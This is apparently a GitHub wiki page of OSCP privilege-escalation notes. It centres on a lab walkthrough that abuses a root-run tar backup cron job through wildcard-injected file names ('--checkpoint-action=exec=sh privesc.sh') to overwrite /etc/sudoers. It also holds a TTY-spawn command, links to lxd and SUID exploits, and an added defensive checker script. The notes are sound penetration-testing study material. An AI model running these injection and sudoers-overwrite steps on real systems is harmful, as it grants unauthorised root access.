Priv Esc Experience - rabakuku/OSCP-PWK GitHub Wiki
Get Root if user is part of LXD Linux Group
https://www.geeksforgeeks.org/tabby-hack-the-box-walkthrough-for-root-flag/?ref=rp
git clone https://github.com/saghul/lxd-alpine-builder.git
CRON backups job using TAR
The linpeas output and manual poking around revealed a backups job that gets run and saved to /home/milesdyson/backsups. The script is owned and run as root, using tar for the backups.
Reading this awesome article by int0x33 shows exactly how to abuse the wildcard in "tar * " into using file names as command arguments to be able to either run a reverse shell script or add the current user into the sudoers file.
I decided to go the sudoers route. I ran "shell" to drop into a normal shell and ran the following to get a proper TTY terminal session.
python -c 'import pty;pty.spawn("/bin/bash")'
I moved to /var/www/html (which is the directory being tar'd) and ran the following.
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
After a short while I ran "sudo -l" with the following results.
User www-data may run the following commands on skynet: (root) NOPASSWD: ALL
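A defender-side check for the backup job described above, as an added example that is not part of the original notes: it lists file names a bare "*" would hand to tar as options, and flags job lines that pass an unguarded "*" to tar. The function names, the sample job lines and the /tmp paths are constructed for illustration.

```sh
#!/bin/sh
# Added defensive example, not part of the original notes.

# Print entries in DIR whose names begin with "-". A bare "*" expands to
# these names and tar parses them as options instead of files.
list_option_like_names() {
    for path in "$1"/*; do
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        case $name in
            -*) printf '%s\n' "$name" ;;
        esac
    done
}

# Return 0 if a command line runs tar with a bare "*" that is not preceded
# by "--". Heuristic word scan: it does not parse quoting or ";".
tar_glob_is_unsafe() {
    seen_tar=0 guarded=0 unsafe=1
    set -f                      # keep the "*" under inspection literal
    for word in $1; do
        case $word in
            tar|*/tar) seen_tar=1 ;;
            --) guarded=$seen_tar ;;
            \*) if [ "$seen_tar" -eq 1 ] && [ "$guarded" -eq 0 ]; then
                    unsafe=0
                fi ;;
        esac
    done
    set +f
    return "$unsafe"
}

# Constructed demo: scratch directory and sample job lines (paths are made up).
demo=$(mktemp -d)
: > "$demo/index.html"
: > "$demo/--checkpoint=1"
list_option_like_names "$demo"
tar_glob_is_unsafe 'tar cf /tmp/backup.tgz *' && echo 'unsafe: bare * after tar'
tar_glob_is_unsafe 'tar cf /tmp/backup.tgz -- *' || echo 'ok: -- ends option parsing'
tar_glob_is_unsafe 'tar cf /tmp/backup.tgz ./*' || echo 'ok: ./ prefix, no leading dash'
rm -rf "$demo"
```

Either corrected form ("-- *" or "./*") keeps tar from treating file names as options; a root-run job should also not archive from a directory that an unprivileged account can write to.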
Readable Shadow
https://github.com/rabakuku/OSCP-PWK/blob/master/Priv%20Escalation/Reable%20Shadow.txt
Writable Passwd
https://github.com/rabakuku/OSCP-PWK/blob/master/Priv%20Escalation/Writable%20Passwd.txt
Environment Variables
https://github.com/rabakuku/OSCP-PWK/blob/master/Priv%20Escalation/Environment%20Variables.txt
CronJobs
https://github.com/rabakuku/OSCP-PWK/blob/master/Priv%20Escalation/CronJobs.txt
SQL Running as Root
https://github.com/rabakuku/OSCP-PWK/blob/master/Priv%20Escalation/SQL.txt
Path Variable
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
I have rooted Boxes with the following:
/bin/systemctl <-- SUID
lxd <-- Sudo: https://www.exploit-db.com/exploits/46978
g0tmi1k
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Step by Step
https://guif.re/linuxeop#Get%20proof
LinEnum
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh